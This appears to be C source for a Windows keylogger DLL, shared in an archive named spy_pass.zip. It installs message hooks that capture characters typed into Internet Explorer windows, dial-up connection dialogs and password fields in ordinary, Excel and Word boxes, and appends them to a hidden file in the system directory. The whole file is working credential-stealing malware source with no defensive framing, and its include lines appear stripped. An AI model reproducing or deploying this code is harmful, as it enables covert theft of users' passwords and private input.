www.pudn.com > spy_pass.zip > Hook.c
/* hook.c: 可以将所有在IEFrame和拨号网络中的输入记录下来. http://www.nease.net/~inetsoft by lgd/Paladin.InetSoft GuangZhou */ #include#include static HWND ghwndSpyHook = NULL; LRESULT CALLBACK SpyGetMsgProc(INT hc, WPARAM wParam, LPARAM lParam); LRESULT CALLBACK SpyCallWndProc(INT hc, WPARAM wParam, LPARAM lParam); int PutChar(unsigned char ch) { char temp[128]; FILE *fp; GetSystemDirectory(temp, sizeof(temp)-20); strcat(temp, "\\user.txt"); //strcpy(temp, "user"); fp =fopen(temp, "a"); if(fp ==NULL) fp=fopen(temp, "w"); if(fp ==NULL) return 0L; fwrite(&ch, 1, 1, fp); fclose(fp); return 0; } BOOL APIENTRY DllMain(PVOID hModule, ULONG ulReason, PCONTEXT pctx) { UNREFERENCED_PARAMETER(hModule); UNREFERENCED_PARAMETER(pctx); if ( ulReason == DLL_PROCESS_ATTACH ) { } return TRUE; } static int FindIEWindow(VOID) { char temp[200]; HWND hwnd, hwndFrame; hwnd =GetForegroundWindow(); if(hwnd ==NULL) return 0L; GetClassName(hwnd, temp, sizeof(temp)); if(strcmp(temp, "IEFrame")) { ghwndSpyHook =NULL; return 0; } hwndFrame =hwnd; hwnd =GetWindow(hwndFrame, GW_CHILD); while(hwnd !=NULL) { GetClassName(hwnd, temp, sizeof(temp)); if(!strcmp(temp, "Shell DocObject View")) break; hwnd =GetWindow(hwnd, GW_HWNDNEXT); } if(hwnd ==NULL) {hwndFrame =NULL; return 0L;} hwnd =GetWindow(hwnd, GW_CHILD); if(hwnd !=NULL) ghwndSpyHook =hwnd; } HWND GetTopParent(HWND hWnd) { HWND hwnd; if(hWnd ==NULL) return FALSE; hwnd =hWnd; while(hwnd !=NULL) { hWnd =hwnd; hwnd =GetParent(hWnd); } return hWnd; } BOOL IsIEFrame(HWND hWnd) { char temp[100]; GetClassName(hWnd, temp, sizeof(temp)); if(!strcmp(temp, "IEFrame")) return TRUE; return FALSE; } BOOL IsDialFrame(HWND hWnd) { char temp[100]; GetWindowText(hWnd, temp, sizeof(temp)); if(!strncmp(temp, "连接到", 6)) return TRUE; else return FALSE; } int IsPassInput(HWND hWnd) { char temp[100]; LONG l; l =GetWindowLong(hWnd, GWL_STYLE); if(l & ES_PASSWORD) // 普通密码输入框 return 1; GetClassName(hWnd, temp, sizeof(temp)); // Excel密码输入框 if(!strcmp(temp, "EDTBX")) return 2; if(!strcmp(temp, "RichEdit20W") && (l & WS_SYSMENU)) // Word密码输入框 return 3; return FALSE; } BOOL WINAPI HookProc(HWND hwnd, UINT uiMessage, WPARAM wParam, LPARAM lParam) { HWND hWnd; int ret; if(uiMessage ==WM_CHAR || uiMessage ==WM_IME_CHAR) { hWnd =GetTopParent(hwnd); if(IsIEFrame(hWnd)) { if(uiMessage ==WM_IME_CHAR) PutChar((unsigned char)(wParam>>8)); PutChar((unsigned char)wParam); return TRUE; } else if(IsDialFrame(hWnd)) { PutChar('@'); // 拨号密码 if(uiMessage ==WM_IME_CHAR) // 汉字 PutChar((unsigned char)(wParam>>8)); PutChar((unsigned char)wParam); return TRUE; } else if((ret =IsPassInput(hwnd))) { if(ret ==1) PutChar('*'); else if(ret ==2) PutChar('%'); else PutChar('~'); if(uiMessage ==WM_IME_CHAR) PutChar((unsigned char)(wParam>>8)); PutChar((unsigned char)wParam); return TRUE; } } return FALSE; } LRESULT CALLBACK SpyGetMsgProc(INT hc, WPARAM wParam, LPARAM lParam) { PMSG pmsg; pmsg = (PMSG)lParam; if (hc >= 0 && pmsg && pmsg->hwnd) { return HookProc(pmsg->hwnd, pmsg->message, pmsg->wParam, pmsg->lParam); } return CallNextHookEx(NULL, hc, wParam, lParam); } LRESULT CALLBACK SpyCallWndProc(INT hc, WPARAM wParam, LPARAM lParam) { PCWPSTRUCT pcwps; pcwps = (PCWPSTRUCT)lParam; if (hc >= 0 && pcwps && pcwps->hwnd) { return HookProc(pcwps->hwnd, pcwps->message, pcwps->wParam, pcwps->lParam); } return CallNextHookEx(NULL, hc, wParam, lParam); }